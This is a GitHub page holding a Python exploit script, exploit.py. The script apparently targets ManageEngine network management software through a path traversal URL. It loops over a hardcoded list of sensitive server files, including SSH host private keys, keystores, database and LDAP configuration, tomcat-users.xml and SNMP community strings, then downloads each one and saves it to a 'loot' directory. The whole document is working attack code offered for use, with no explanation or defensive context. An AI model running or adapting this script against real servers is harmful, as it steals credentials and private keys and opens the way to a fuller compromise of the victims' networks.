-
Notifications
You must be signed in to change notification settings - Fork 13
/
Copy pathexploit.py
110 lines (88 loc) · 2.85 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
import os
import argparse
import urllib.error
from urllib.request import urlopen
from random import randint
def save_to_file(data, dest_file):
with open(dest_file, "wb") as file_out:
file_out.write(data)
def exploit(host, port, target_file, ssl=False):
uri = f"/cachestart/{randint(1,6)}/cacheend/apiclient"
uri += f"/fluidicv2/javascript/jquery/../../../../{target_file}"
port = str(int(port))
if ssl == True:
if port == "443":
base_url = f"https://{host}"
else:
base_url = f"https://{host}:{port}"
elif ssl == False:
if port == "80":
base_url = f"http://{host}"
else:
base_url = f"http://{host}:{port}"
url = f"{base_url}{uri}"
resp = urlopen(url)
data = resp.read()
return data
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-t', action="store", dest="target",
default=None, help="Target IP or hostname to exploit")
parser.add_argument('-p', action="store", dest="port",
type=int, default=8060, help="Remote port of the target")
parser.add_argument('-d', action="store", dest="loot_dir",
default="./", help="Directory to store loot")
parser.add_argument('-s', action='store_true', dest="arg_ssl",
default=False, help="Target uses SSL")
args = parser.parse_args()
if args.target == None:
print("Error: You must specify the target host with the '-t' flag")
os._exit(1)
target_files = [
"bin/.ssh_host_dsa_key",
"bin/.ssh_host_dsa_key.pub",
"bin/.ssh_host_rsa_key",
"bin/.ssh_host_rsa_key.pub",
"conf/client.keystore",
"conf/customer-config.xml",
"conf/database_params.conf",
"conf/FirewallAnalyzer/aaa_auth-conf.xml",
"conf/FirewallAnalyzer/auth-conf_ppm.xml",
"conf/gateway.conf",
"conf/itom.truststore",
"conf/netflow/auth-conf.xml",
"conf/netflow/server.xml",
"conf/netflow/ssl_server.xml",
"conf/NFAEE/cs_server.xml",
"conf/OpManager/database_params.conf",
"conf/OpManager/database_params_DE.conf",
"conf/OpManager/ldap.conf",
"conf/OpManager/MicrosoftSQL/database_params.conf",
"conf/OpManager/POSTGRESQL/database_params.conf",
"conf/OpManager/POSTGRESQL/database_params_DE.conf",
"conf/OpManager/securitydbData.xml",
"conf/OpManager/SnmpDefaultProperties.xml",
"conf/Oputils/snmp/Community.xml",
"conf/Persistence/DBconfig.xml",
"conf/Persistence/persistence-configurations.xml",
"conf/pmp/PMP_API.conf",
"conf/pmp/pmp_server_cert.p12",
"conf/product-config.xml",
"conf/SANSeed.xml",
"conf/server.keystore",
"conf/server.xml",
"conf/system_properties.conf",
"conf/tomcat-users.xml",
"lib/OPM_APNS_Cert.p12"
]
for file in target_files:
try:
data = exploit(args.target, args.port, file, ssl=False)
except urllib.error.HTTPError as e:
print(f"[-] {file} - {str(e)}")
continue
dest = args.loot_dir + file.replace('/', '|').strip()
save_to_file(data, dest)
print(f"[+] {file} saved to {dest}")
if __name__ == '__main__':
main()